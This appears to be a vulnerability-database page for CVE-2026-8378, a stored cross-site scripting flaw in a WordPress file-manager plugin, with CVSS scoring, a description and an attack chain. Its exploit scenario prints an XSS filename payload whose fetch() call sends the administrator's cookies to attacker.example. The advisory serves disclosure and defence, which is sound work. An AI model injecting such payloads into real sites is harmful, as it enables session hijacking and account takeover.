Skip to main content

Frontend File Manager Plugin CVE-2026-8378

| EUVD-2026-38419 MEDIUM
2026-06-23 WPScan GHSA-v62r-5pwf-6945
XSS WordPress Frontend File Manager Plugin
5.4
CVSS 3.1 · Vendor: WPScan
Share

Severity by source

Vendor (WPScan) PRIMARY
5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

PR:L confirmed by subscriber-level requirement; UI:R because admin must view listing; S:C reflects cross-context execution in admin session; no availability impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (WPScan).

CVSS VectorVendor: WPScan

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

4
Analysis Generated
Jun 23, 2026 - 13:24 vuln.today
CVSS changed
Jun 23, 2026 - 13:22 NVD
5.4 (MEDIUM)
CVE Published
Jun 23, 2026 - 06:00 cve.org
MEDIUM 5.4
CVE Published
Jun 23, 2026 - 06:00 cve.org
UNKNOWN (no severity yet)

DescriptionCVE.org

The Frontend File Manager Plugin WordPress plugin through 23.6 does not sanitise nor escape a filename submitted to the frontend file-rename endpoint before storing it as post meta and rendering it back on the admin File Manager listing, leading to a Stored Cross-Site Scripting vulnerability exploitable by users with Subscriber-level access and above against an administrator viewing the file management interface.

AnalysisAI

Stored Cross-Site Scripting in the Frontend File Manager Plugin for WordPress (versions through 23.6) allows any authenticated subscriber-level user to compromise administrator sessions by injecting malicious script payloads via the frontend file-rename endpoint. The unsanitized filename is persisted as post meta and subsequently rendered unescaped within the WordPress admin File Manager listing, triggering execution whenever an administrator views that interface. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Register or compromise subscriber account
Delivery
Submit malicious filename to file-rename endpoint
Exploit
Payload stored in WordPress post meta
Execution
Admin navigates to File Manager listing
Persist
Stored script executes in admin browser
Impact
Hijack admin session or create backdoor account
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold at minimum a Subscriber-level WordPress account on the target site (PR:L per CVSS vector); sites with open user registration are therefore more broadly exposed than invitation-only or closed-registration installations. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 5.4 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N accurately reflects the attack dynamics: low attack complexity, requiring only subscriber-level authentication and passive admin interaction. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers or uses an existing subscriber-level WordPress account on the target site and submits a filename such as '><img src=x onerror=fetch(`https://attacker.example/steal?c=`+document.cookie)> to the frontend file-rename endpoint. The payload is stored in post meta without sanitization. …
Remediation No vendor-released patch identified at time of analysis - no fixed version appears in available intelligence sources. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-8379 HIGH POC
7.5 Jun 23

Unauthenticated file disclosure in the Frontend File Manager Plugin for WordPress (all versions through 23.6) exposes ev

Share

CVE-2026-8378 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy